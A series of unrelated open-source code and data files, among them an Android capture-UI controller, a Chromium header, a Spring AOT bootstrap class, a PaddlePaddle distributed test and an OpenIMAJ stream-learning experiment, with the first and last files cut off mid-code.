                    if (isMimicRunning()) {
                        mCountDownTimer.resume();
                        mProgressButton.setReady();
                    }
                }
            });
        }
    }

    /**
     * Reports a terminal failure: stops the timer, disables the button, and
     * notifies the mimic implementation after the banner animation.
     */
    public void onMimicFailure(String failureMessage) {
        Log.d(TAG, "Entered onMimicFailure!");
        handleButtonState();
        mCountDownTimer.stop();
        mProgressButton.setClickable(false);
        mMimicStateBanner.failure(failureMessage, new MimicStateBanner.Command() {
            @Override
            public void execute() {
                Log.d(TAG, "Entered onMimicFailure callback!");
                IMimicImplementation mimic = mMimicRef.get();
                if (mimic != null) {
                    mimic.onFailed();
                }
            }
        });
    }

    /** Reports an internal error: stops the UI and notifies the mimic immediately. */
    public void onMimicInternalError() {
        Log.d(TAG, "Entered onMimicInternalError!");
        handleButtonState();
        mCountDownTimer.stop();
        mProgressButton.setClickable(false);
        IMimicImplementation mimic = mMimicRef.get();
        if (mimic != null) {
            mimic.onInternalError();
        }
    }

    public void registerStateBanner(MimicStateBanner mimicStateBanner) {
        mMimicStateBanner = mimicStateBanner;
    }

    /**
     * Registers and initializes the countdown timer. When the timer expires the
     * mimic's capture is stopped and it is notified of the expiry.
     */
    public void registerCountDownTimer(CountDownTimerView countDownTimer, int timeout) {
        mCountDownTimer = countDownTimer;
        mCountDownTimer.init(timeout, new CountDownTimerView.Command() {
            @Override
            public void execute() {
                Log.d(TAG, "Countdown timer expired!");
                if (isMimicRunning()) {
                    IMimicImplementation mimic = mMimicRef.get();
                    if (mimic != null) {
                        mimic.stopCapture();
                        mimic.onCountDownTimerExpired();
                    }
                }
            }
        });
    }

    /**
     * Registers the progress button and wires its click behavior:
     * AUDIO toggles capture start/stop; CAMERA pauses the timer and captures once.
     */
    public void registerProgressButton(ProgressButton progressButton,
                                       MimicButtonBehavior buttonBehavior) {
        mProgressButton = progressButton;
        mButtonBehavior = buttonBehavior;
        if (mButtonBehavior == MimicButtonBehavior.AUDIO) {
            mProgressButton.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View view) {
                    if (mProgressButton.isReady()) {
                        IMimicImplementation mimic = mMimicRef.get();
                        if (mimic != null) {
                            mimic.startCapture();
                        }
                        mProgressButton.waiting();
                    } else {
                        IMimicImplementation mimic = mMimicRef.get();
                        if (mimic != null) {
                            mimic.stopCapture();
                        }
                    }
                }
            });
        } else if (mButtonBehavior == MimicButtonBehavior.CAMERA) {
            mProgressButton.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View v) {
                    mCountDownTimer.pause();
                    mProgressButton.loading();
                    IMimicImplementation mimic = mMimicRef.get();
                    if (mimic != null) {
                        mimic.startCapture();
                    }
                }
            });
        }
        mProgressButton.setReady();
    }

    public void registerMimic(IMimicImplementation mimic) {
        mMimicRef = new WeakReference<>(mimic);
    }

    // Camera-mode buttons animate while loading and must be explicitly stopped.
    private void handleButtonState() {
        if (mButtonBehavior == MimicButtonBehavior.CAMERA) {
            mProgressButton.stop();
        }
    }
}
| 3,800
|
322
|
<filename>app/i18n/locales/cs/dashboard.json
{
"welcome": "Vítejte",
"newNote": "Nová poznámka",
"settings": "Nastavení",
  "about": "O aplikaci"
}
| 73
|
348
|
<filename>docs/data/leg-t2/027/02703516.json
{"nom":"Saint-Aubin-le-Vertueux","circ":"3ème circonscription","dpt":"Eure","inscrits":668,"abs":344,"votants":324,"blancs":6,"nuls":17,"exp":301,"res":[{"nuance":"MDM","nom":"<NAME>","voix":217},{"nuance":"FN","nom":"<NAME>","voix":84}]}
| 118
|
1,062
|
//
// Generated by class-dump 3.5b1 (64 bit) (Debug version compiled Dec 3 2019 19:59:57).
//
// Copyright (C) 1997-2019 <NAME>.
//
#import <MailFW/MFEWSNetworkTaskOperation.h>
@class MFEWSMailboxItemsBatch;
@protocol MFEWSFetchMessageMetadataOperationDelegate;
// Network operation that (presumably, from the names — class-dump generated,
// no source available) fetches message metadata for a batch of EWS mailbox
// items and reports to its delegate. Offsets in trailing comments are ivar
// layout positions recovered by class-dump.
@interface MFEWSFetchMessageMetadataOperation : MFEWSNetworkTaskOperation
{
    id <MFEWSFetchMessageMetadataOperationDelegate> _delegate; // 8 = 0x8
    MFEWSMailboxItemsBatch *_batch; // 16 = 0x10
}

+ (id)_propertiesForItemClass:(Class)arg1; // IMP=0x000000000007ab5f
+ (id)_shapeForType:(Class)arg1; // IMP=0x000000000007aad4
@property(readonly, nonatomic) MFEWSMailboxItemsBatch *batch; // @synthesize batch=_batch;
@property(nonatomic) __weak id <MFEWSFetchMessageMetadataOperationDelegate> delegate; // @synthesize delegate=_delegate;
// - (void).cxx_destruct; // IMP=0x000000000007b6f7
- (void)main; // IMP=0x0000000000079dce
- (id)init; // IMP=0x0000000000079cf0
- (id)initWithBatch:(id)arg1; // IMP=0x0000000000079c82
@end
| 387
|
14,668
|
<reponame>zealoussnow/chromium
// Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CONTENT_PUBLIC_BROWSER_CONTENT_INDEX_CONTEXT_H_
#define CONTENT_PUBLIC_BROWSER_CONTENT_INDEX_CONTEXT_H_
#include <string>
#include <vector>
#include "base/callback_forward.h"
#include "content/common/content_export.h"
#include "content/public/browser/content_index_provider.h"
#include "third_party/abseil-cpp/absl/types/optional.h"
#include "third_party/blink/public/mojom/content_index/content_index.mojom.h"
class SkBitmap;
namespace url {
class Origin;
} // namespace url
namespace content {
// Owned by the Storage Partition. This is used by the ContentIndexProvider to
// query auxiliary data for its entries from the right source.
class CONTENT_EXPORT ContentIndexContext {
 public:
  using GetAllEntriesCallback =
      base::OnceCallback<void(blink::mojom::ContentIndexError,
                              std::vector<ContentIndexEntry>)>;
  using GetEntryCallback =
      base::OnceCallback<void(absl::optional<ContentIndexEntry>)>;
  using GetIconsCallback = base::OnceCallback<void(std::vector<SkBitmap>)>;

  ContentIndexContext() = default;

  ContentIndexContext(const ContentIndexContext&) = delete;
  ContentIndexContext& operator=(const ContentIndexContext&) = delete;

  virtual ~ContentIndexContext() = default;

  // Returns all available icons for the entry identified by
  // |service_worker_registration_id| and |description_id|.
  // The number of icons and the sizes are chosen by the ContentIndexProvider.
  // Must be called on the UI thread. |callback| must be invoked on the
  // UI thread.
  virtual void GetIcons(int64_t service_worker_registration_id,
                        const std::string& description_id,
                        GetIconsCallback callback) = 0;

  // Must be called on the UI thread.
  virtual void GetAllEntries(GetAllEntriesCallback callback) = 0;

  // Must be called on the UI thread.
  virtual void GetEntry(int64_t service_worker_registration_id,
                        const std::string& description_id,
                        GetEntryCallback callback) = 0;

  // Called when a user deleted an item. Must be called on the UI thread.
  virtual void OnUserDeletedItem(int64_t service_worker_registration_id,
                                 const url::Origin& origin,
                                 const std::string& description_id) = 0;
};
} // namespace content
#endif // CONTENT_PUBLIC_BROWSER_CONTENT_INDEX_CONTEXT_H_
| 928
|
1,027
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.alipay.remoting.rpc.userprocessor.multiinterestprocessor;
import java.io.Serializable;
/**
 * @author muyun.cyt (<EMAIL>) 2018/7/5 11:20 AM
*/
public interface MultiInterestBaseRequestBody extends Serializable {
    // Extends Serializable — presumably so request bodies can be marshalled by
    // the remoting transport; confirm against the codec before relying on it.

    /**
     * Getter method for property <tt>id</tt>.
     *
     * @return property value of id
     */
    int getId();

    /**
     * Setter method for property <tt>id</tt>.
     *
     * @param id value to be assigned to property id
     */
    void setId(int id);

    /**
     * Getter method for property <tt>msg</tt>.
     *
     * @return property value of msg
     */
    String getMsg();

    /**
     * Setter method for property <tt>msg</tt>.
     *
     * @param msg value to be assigned to property msg
     */
    void setMsg(String msg);
}
| 504
|
687
|
// Copyright 2021 The XLS Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "xls/common/logging/check_ops.h"
#include <sstream>
#include "gmock/gmock.h"
#include "gtest/gtest.h"
#include "xls/common/casts.h"
namespace xls::logging_internal {
namespace {
// Exercises CheckOpMessageBuilder's incremental message assembly:
// ForVar1() yields a stream primed with "<msg> (", ForVar2() returns the same
// stream after appending the " vs. " separator, and NewString() closes the
// message with ")".
TEST(CheckOpsTest, MessageBuilder) {
  CheckOpMessageBuilder mb("foo");
  std::ostream* os = mb.ForVar1();
  // down_cast to inspect the accumulated text; relies on the builder backing
  // its stream with an ostringstream (an internal detail of CheckOpMessageBuilder).
  auto* oss = down_cast<std::ostringstream*>(os);
  EXPECT_EQ(oss->str(), "foo (");
  // ForVar2 must return the very same stream, now holding the separator.
  EXPECT_EQ(mb.ForVar2(), os);
  EXPECT_EQ(oss->str(), "foo ( vs. ");
  std::unique_ptr<std::string> s(mb.NewString());
  EXPECT_EQ(*s, "foo ( vs. )");
}
} // namespace
} // namespace xls::logging_internal
| 399
|
507
|
/*
* Copyright 2019-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.aot.context.bootstrap.generator.infrastructure;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;
import java.util.stream.Collectors;
import javax.lang.model.element.Modifier;
import com.squareup.javapoet.ClassName;
import com.squareup.javapoet.JavaFile;
import com.squareup.javapoet.ParameterizedTypeName;
import org.springframework.aot.context.bootstrap.generator.infrastructure.nativex.NativeConfigurationRegistry;
import org.springframework.context.ApplicationContextInitializer;
import org.springframework.context.support.GenericApplicationContext;
/**
 * Context for components that write code to bootstrap the context.
*
* @author <NAME>
*/
public class BootstrapWriterContext {

    // Package in which the main bootstrap class lives.
    private final String packageName;

    // Creates a BootstrapClass for a package name on first request.
    private final Function<String, BootstrapClass> bootstrapClassFactory;

    private final ProtectedAccessAnalyzer protectedAccessAnalyzer;

    // Lazily-populated cache of bootstrap classes, keyed by package name.
    private final Map<String, BootstrapClass> bootstrapClasses = new HashMap<>();

    private final NativeConfigurationRegistry nativeConfigurationRegistry = new NativeConfigurationRegistry();

    // Eagerly registers the main bootstrap class for the default package.
    BootstrapWriterContext(String packageName, Function<String, BootstrapClass> bootstrapClassFactory) {
        this.packageName = packageName;
        this.bootstrapClassFactory = bootstrapClassFactory;
        this.protectedAccessAnalyzer = new ProtectedAccessAnalyzer(this.packageName);
        this.bootstrapClasses.put(packageName, bootstrapClassFactory.apply(packageName));
    }

    /**
     * Create a context targeting the specified package name and using a unique name for
     * all classes handled by this instance. The {@link BootstrapClass} for the main
     * context is an {@link ApplicationContextInitializer} while the package protected
     * bootstrap classes are empty {@code public final} types.
     * @param packageName the default package name
     * @param className the name to use for bootstrap classes handled by this instance
     */
    public BootstrapWriterContext(String packageName, String className) {
        this(packageName, bootstrapClassFactory(packageName, className));
    }

    // The default package gets an ApplicationContextInitializer implementation;
    // any other package gets an empty public final holder type.
    private static Function<String, BootstrapClass> bootstrapClassFactory(String defaultPackageName, String className) {
        return (targetPackageName) -> {
            if (targetPackageName.equals(defaultPackageName)) {
                ParameterizedTypeName typeName = ParameterizedTypeName.get(ApplicationContextInitializer.class,
                        GenericApplicationContext.class);
                return BootstrapClass.of(ClassName.get(targetPackageName, className), (type) ->
                        type.addSuperinterface(typeName).addModifiers(Modifier.PUBLIC));
            }
            else {
                return BootstrapClass.of(ClassName.get(targetPackageName, className),
                        (type) -> type.addModifiers(Modifier.PUBLIC, Modifier.FINAL));
            }
        };
    }

    /**
     * Return the package name in which the main bootstrap class is located.
     * @return the default package name
     */
    public String getPackageName() {
        return this.packageName;
    }

    /**
     * Return the {@link ProtectedAccessAnalyzer} to use.
     * @return the protected access analyzer
     */
    public ProtectedAccessAnalyzer getProtectedAccessAnalyzer() {
        return this.protectedAccessAnalyzer;
    }

    /**
     * Return a {@link BootstrapClass} for the specified package name. If it does not
     * exist, it is created.
     * @param packageName the package name to use
     * @return the bootstrap class
     */
    public BootstrapClass getBootstrapClass(String packageName) {
        return this.bootstrapClasses.computeIfAbsent(packageName, this.bootstrapClassFactory);
    }

    /**
     * Return the default {@link BootstrapClass}.
     * @return the bootstrap class for the target package
     * @see #getPackageName()
     */
    public BootstrapClass getMainBootstrapClass() {
        return getBootstrapClass(this.packageName);
    }

    /**
     * Specify if a {@link BootstrapClass} for the specified package name is registered.
     * @param packageName the package name to use
     * @return {@code true} if the class is registered for that package
     */
    public boolean hasBootstrapClass(String packageName) {
        return this.bootstrapClasses.containsKey(packageName);
    }

    /**
     * Return the list of {@link JavaFile} of known bootstrap classes.
     * @return the java files of bootstrap classes in this instance
     */
    public List<JavaFile> toJavaFiles() {
        return this.bootstrapClasses.values().stream().map(BootstrapClass::toJavaFile).collect(Collectors.toList());
    }

    /**
     * Return a {@link NativeConfigurationRegistry} for recording the necessary native
     * configuration for this context
     * @return the native configuration registry
     */
    public NativeConfigurationRegistry getNativeConfigurationRegistry() {
        return this.nativeConfigurationRegistry;
    }
}
| 1,488
|
19,046
|
/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
#ifdef _MSC_VER
// This needs to be before the libevent include.
#include <folly/portability/Windows.h>
#endif
#include <event.h>
#ifdef _MSC_VER
#include <event2/event_compat.h> // @manual
// The signal_set macro from libevent 2 compat conflicts with the
// boost::asio::signal_set function
#undef signal_set
#include <folly/portability/Fcntl.h>
#endif
// The signal_set macro from libevent 1.4.14b-stable conflicts with the
// boost::asio::signal_set function
#if _EVENT_NUMERIC_VERSION == 0x01040e00
#undef signal_set
#endif
#include <folly/net/detail/SocketFileDescriptorMap.h>
namespace folly {
// Alias for the type of libevent's per-event file descriptor field (ev_fd).
// decltype keeps it in sync with whatever the installed libevent headers use,
// which differs across platforms/versions.
using libevent_fd_t = decltype(event::ev_fd);
} // namespace folly
| 408
|
590
|
<reponame>lmj0591/mygui
/*
* This source file is part of MyGUI. For the latest info, see http://mygui.info/
* Distributed under the MIT License
* (See accompanying file COPYING.MIT or copy at http://opensource.org/licenses/MIT)
*/
#ifndef MYGUI_LEVEL_LOG_FILTER_H_
#define MYGUI_LEVEL_LOG_FILTER_H_
#include "MyGUI_Prerequest.h"
#include "MyGUI_ILogFilter.h"
namespace MyGUI
{
/** Log filter that accepts only messages whose level is at or above a
	configurable threshold (see setLoggingLevel / shouldLog). */
class MYGUI_EXPORT LevelLogFilter :
	public ILogFilter
{
public:
	LevelLogFilter();

	//! @copydoc ILogFilter::shouldLog(const std::string& _section, LogLevel _level, const struct tm* _time, const std::string& _message, const char* _file, int _line)
	bool shouldLog(const std::string& _section, LogLevel _level, const struct tm* _time, const std::string& _message, const char* _file, int _line) override;

	/** Set logging level.
		@param _value messages with this or higher level will be logged.
	*/
	void setLoggingLevel(LogLevel _value);

	/** Get logging level.
		@return Messages with this or higher level are logged.
	*/
	LogLevel getLoggingLevel() const;

private:
	// Current threshold; messages below this level are filtered out.
	LogLevel mLevel;
};
} // namespace MyGUI
#endif // MYGUI_LEVEL_LOG_FILTER_H_
| 403
|
17,085
|
<filename>python/paddle/fluid/tests/unittests/dist_mnist_gradient_merge_raw_optimizer.py
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.nn as nn
import paddle.fluid as fluid
import paddle.distributed.fleet as fleet
import numpy as np
from test_dist_base import TestDistRunnerBase, runtime_main
from dist_mnist import cnn_model
class TestDistMnistGradientMergeRawOptimizer(TestDistRunnerBase):
    # Distributed MNIST test exercising fleet gradient-merge with the raw
    # optimizer path (without_graph_optimization=True).
    def get_model(self, batch_size=2, single_device=False):
        """Build the MNIST CNN under static graph mode with gradient merge.

        Args:
            batch_size: mini-batch size for the train/test readers.
            single_device: if True, wrap the optimizer in
                GradientMergeOptimizer locally instead of using fleet's
                distributed optimizer.

        Returns:
            Tuple of (test_program, cost, train_reader, test_reader, acc,
            predict) as expected by the TestDistRunnerBase harness.
        """
        paddle.enable_static()
        # Fix seeds so single-device and distributed runs are comparable.
        paddle.seed(1)
        np.random.seed(1)
        # This test only makes sense when build passes are applied to the
        # program (set by the launching test).
        assert fluid.core.globals()['FLAGS_apply_pass_to_program']
        strategy = fleet.DistributedStrategy()
        build_strategy = paddle.static.BuildStrategy()
        # Enable the full set of fusion/inplace passes under test.
        settings = {
            "fuse_relu_depthwise_conv": True,
            "fuse_bn_act_ops": True,
            "fuse_bn_add_act_ops": True,
            "fuse_elewise_add_act_ops": True,
            "fuse_all_optimizer_ops": True,
            "enable_addto": True,
            "enable_inplace": True,
        }
        for k, v in settings.items():
            setattr(build_strategy, k, v)
        strategy.build_strategy = build_strategy
        strategy.gradient_merge = True
        # Whether merged gradients are averaged is driven by the env var set
        # by the launcher.
        avg = os.environ['enable_gm_avg'] == "True"
        strategy.gradient_merge_configs = {
            "k_steps": 2,
            "avg": avg,
        }
        strategy.without_graph_optimization = True
        fleet.init(is_collective=True, strategy=strategy)
        image = paddle.static.data(
            name='image', shape=[None, 1, 28, 28], dtype="float32")
        label = paddle.static.data(name='label', shape=[None, 1], dtype='int64')
        predict = cnn_model(image)
        acc = paddle.metric.accuracy(predict, label)
        loss_fn = nn.CrossEntropyLoss(use_softmax=False)
        cost = loss_fn(predict, label)
        # Clone before minimize() so the test program has no optimizer ops.
        test_program = paddle.static.default_main_program().clone(for_test=True)
        optimizer = paddle.optimizer.Adam(learning_rate=1e-3)
        if single_device:
            optimizer = fluid.optimizer.GradientMergeOptimizer(
                optimizer,
                k_steps=strategy.gradient_merge_configs["k_steps"],
                avg=strategy.gradient_merge_configs["avg"])
            world_size = 1
        else:
            optimizer = fleet.distributed_optimizer(optimizer)
            world_size = fleet.world_size()
        optimizer.minimize(cost)
        if world_size > 1:
            # Gradient merge rewrites the main program into two blocks; block 1
            # holds the merged update ops. Verify the allreduce placement there.
            assert paddle.static.default_main_program().num_blocks == 2
            gm_block = paddle.static.default_main_program().block(1)
            start_allreduce_idx = None
            for i, op in enumerate(gm_block.ops):
                if op.type == "c_allreduce_sum":
                    start_allreduce_idx = i
                    break
            # the magic number 1 below means skip the c_sync_calc_stream op
            if avg:
                assert start_allreduce_idx > 1
            else:
                assert start_allreduce_idx == 1
        train_reader = paddle.batch(
            paddle.dataset.mnist.test(), batch_size=batch_size)
        test_reader = paddle.batch(
            paddle.dataset.mnist.test(), batch_size=batch_size)
        return test_program, cost, train_reader, test_reader, acc, predict
if __name__ == "__main__":
    # Delegate to the shared dist-test harness, which parses role/endpoint
    # flags and drives the model defined above.
    runtime_main(TestDistMnistGradientMergeRawOptimizer)
| 1,728
|
1,165
|
"""Module for running the data retrieval and preprocessing.
Scripts that performs all the steps to get the train and perform preprocessing.
"""
import logging
import argparse
import sys
import shutil
import os
#pylint: disable=no-name-in-module
from helpers import preprocess
from helpers import storage as storage_helper
def parse_arguments(argv):
    """Build the preprocessing argument parser and parse ``argv``.

    Args:
        argv (list): full command line including the program name at
            index 0, which is skipped before parsing.

    Returns:
        argparse.Namespace: the recognised arguments; unknown flags are
        tolerated and ignored via ``parse_known_args``.
    """
    parser = argparse.ArgumentParser(description='Preprocessing')
    parser.add_argument(
        '--bucket',
        default='<your-bucket-name>',
        type=str,
        help='GCS bucket where preprocessed data is saved')
    parser.add_argument(
        '--cutoff_year',
        default='2010',
        type=str,
        help='Cutoff year for the stock data')
    parser.add_argument(
        '--kfp',
        action='store_true',
        dest='kfp',
        help='Kubeflow pipelines flag')
    known_args, _unknown = parser.parse_known_args(args=argv[1:])
    return known_args
def run_preprocess(argv=None):
    """Runs the retrieval and preprocessing of the data.

    Loads closing prices for a fixed set of stock indices, preprocesses them
    into a time series, writes the result to a temporary CSV, and uploads it
    to the configured GCS bucket.

    Args:
        argv (list): command line arguments (including program name); falls
            back to ``sys.argv`` when None.
    """
    logging.info('starting preprocessing of data..')
    args = parse_arguments(sys.argv if argv is None else argv)
    # Stock index tickers whose closing prices feed the preprocessing step.
    tickers = ['snp', 'nyse', 'djia', 'nikkei', 'hangseng', 'ftse', 'dax', 'aord']
    closing_data = preprocess.load_data(tickers, args.cutoff_year)
    time_series = preprocess.preprocess_data(closing_data)
    logging.info('preprocessing of data complete..')
    logging.info('starting uploading of the preprocessed data on GCS..')
    temp_folder = 'data'
    if not os.path.exists(temp_folder):
        os.mkdir(temp_folder)
    file_path = os.path.join(temp_folder, 'data_{}.csv'.format(args.cutoff_year))
    time_series.to_csv(file_path, index=False)
    storage_helper.upload_to_storage(args.bucket, temp_folder)
    # The local copy is no longer needed once it has been uploaded.
    shutil.rmtree(temp_folder)
    if args.kfp:
        # Kubeflow Pipelines reads the produced file path from this
        # well-known location to hand it to the next component.
        with open("/blob_path.txt", "w") as output_file:
            output_file.write(file_path)
    logging.info('upload of the preprocessed data on GCS completed..')
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    run_preprocess()
| 914
|
319
|
<reponame>Celebrate-future/openimaj<filename>demos/sandbox/src/main/java/org/openimaj/demos/sandbox/ml/linear/learner/stream/experiments/FinancialStreamLearningExperiment.java
/**
* Copyright (c) 2011, The University of Southampton and the individual contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of the University of Southampton nor the names of its
* contributors may be used to endorse or promote products derived from this
* software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package org.openimaj.demos.sandbox.ml.linear.learner.stream.experiments;
import java.io.IOException;
import java.net.MalformedURLException;
import java.util.List;
import java.util.Map;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.IncrementalLearnerFunction;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.IncrementalLearnerWorldSelectingEvaluator;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.ModelStats;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.YahooFinanceStream;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.TwitterPredicateFunction;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.TwitterPreprocessingFunction;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.TwitterStatusAsUSMFStatus;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.USMFStatusBagOfWords;
import org.openimaj.ml.linear.evaluation.SumLossEvaluator;
import org.openimaj.ml.linear.learner.BilinearLearnerParameters;
import org.openimaj.ml.linear.learner.init.HardCodedInitStrat;
import org.openimaj.ml.linear.learner.init.SingleValueInitStrat;
import org.openimaj.ml.linear.learner.init.SparseZerosInitStrategy;
import org.openimaj.stream.provider.twitter.TwitterStreamDataset;
import org.openimaj.tools.twitter.modes.filter.LanguageFilter;
import org.openimaj.tools.twitter.modes.preprocessing.LanguageDetectionMode;
import org.openimaj.tools.twitter.modes.preprocessing.StopwordMode;
import org.openimaj.tools.twitter.modes.preprocessing.TokeniseMode;
import org.openimaj.twitter.USMFStatus;
import org.openimaj.util.api.auth.DefaultTokenFactory;
import org.openimaj.util.api.auth.common.TwitterAPIToken;
import org.openimaj.util.concurrent.ArrayBlockingDroppingQueue;
import org.openimaj.util.data.Context;
import org.openimaj.util.function.Operation;
import org.openimaj.util.function.context.ContextFunctionAdaptor;
import org.openimaj.util.function.context.ContextListFilter;
import org.openimaj.util.function.context.ContextListFunction;
import org.openimaj.util.pair.Pair;
import org.openimaj.util.stream.Stream;
import org.openimaj.util.stream.combine.ContextStreamCombiner;
import org.openimaj.util.stream.window.ContextRealTimeWindowFunction;
import org.openimaj.util.stream.window.WindowAverage;
import twitter4j.Status;
/**
 * Streaming learning experiment: combines a real-time Yahoo Finance price
 * stream (AAPL, GOOG) with a live Twitter stream, turns tweets into
 * per-user bag-of-words features, and incrementally trains a bilinear
 * learner, printing the loss and most important words for every combined
 * window.
 *
 * @author <NAME> (<EMAIL>)
 *
 */
public class FinancialStreamLearningExperiment {
    /**
     * Runs the experiment until the process is terminated.
     *
     * @param args ignored
     * @throws MalformedURLException if the finance stream URL is malformed
     * @throws IOException on stream I/O failure
     */
    public static void main(String[] args) throws MalformedURLException, IOException {
        // The financial stream
        // Window ticks into 5-second real-time buckets, then average each
        // bucket into the "averageticks" context slot.
        final ContextRealTimeWindowFunction<Map<String, Double>> yahooWindow = new ContextRealTimeWindowFunction<Map<String, Double>>(
                5000);
        final Stream<Context> yahooAveragePriceStream = new YahooFinanceStream("AAPL", "GOOG")
                .transform(yahooWindow)
                .map(
                        new ContextFunctionAdaptor<List<Map<String, Double>>, Map<String, Double>>(
                                new WindowAverage(), "item",
                                "averageticks"
                        )
                );
        // The Twitter Stream
        // Capacity-1 dropping queue: when processing lags, older unread
        // statuses are silently discarded rather than blocking the stream.
        final ArrayBlockingDroppingQueue<Status> buffer = new ArrayBlockingDroppingQueue<Status>(1);
        final LanguageDetectionMode languageDetectionMode = new LanguageDetectionMode();
        final StopwordMode stopwordMode = new StopwordMode();
        final TokeniseMode tokeniseMode = new TokeniseMode();
        final Stream<Context> twitterUserWordCountStream = new TwitterStreamDataset(
                DefaultTokenFactory.get(TwitterAPIToken.class), buffer
        )
                // Same 5-second real-time windowing as the finance stream so
                // both sides can be combined window-for-window.
                .transform(new ContextRealTimeWindowFunction<Status>(5000))
                .map(
                        new ContextListFunction<Status, USMFStatus>(new TwitterStatusAsUSMFStatus(), "item",
                                "usmfstatuses"
                        )
                )
                // Language detection, tokenisation and stopword removal.
                .map(
                        new ContextListFunction<USMFStatus, USMFStatus>(new TwitterPreprocessingFunction(languageDetectionMode, tokeniseMode,
                                stopwordMode),
                                "usmfstatuses"
                        )
                )
                // Keep English statuses only.
                .map(new ContextListFilter<USMFStatus>(new TwitterPredicateFunction(new LanguageFilter("en")),
                        "usmfstatuses"
                )
                )
                // Collapse each window's statuses into bag-of-words features.
                .map(
                        new ContextFunctionAdaptor<List<USMFStatus>, Map<String, Map<String, Double>>>(new USMFStatusBagOfWords(new StopwordMode()),
                                "usmfstatuses",
                                "bagofwords"
                        )
                );
        // Bilinear learner hyper-parameters.
        final BilinearLearnerParameters params = new BilinearLearnerParameters();
        params.put(BilinearLearnerParameters.ETA0_U, 0.02);
        params.put(BilinearLearnerParameters.ETA0_W, 0.02);
        params.put(BilinearLearnerParameters.LAMBDA, 0.001);
        params.put(BilinearLearnerParameters.BICONVEX_TOL, 0.01);
        params.put(BilinearLearnerParameters.BICONVEX_MAXITER, 10);
        params.put(BilinearLearnerParameters.BIAS, true);
        params.put(BilinearLearnerParameters.ETA0_BIAS, 0.5);
        params.put(BilinearLearnerParameters.WINITSTRAT, new SingleValueInitStrat(0.1));
        params.put(BilinearLearnerParameters.UINITSTRAT, new SparseZerosInitStrategy());
        final HardCodedInitStrat biasInitStrat = new HardCodedInitStrat();
        // NOTE(review): biasInitStrat is registered but never seeded with a
        // matrix in this class — confirm it is configured elsewhere.
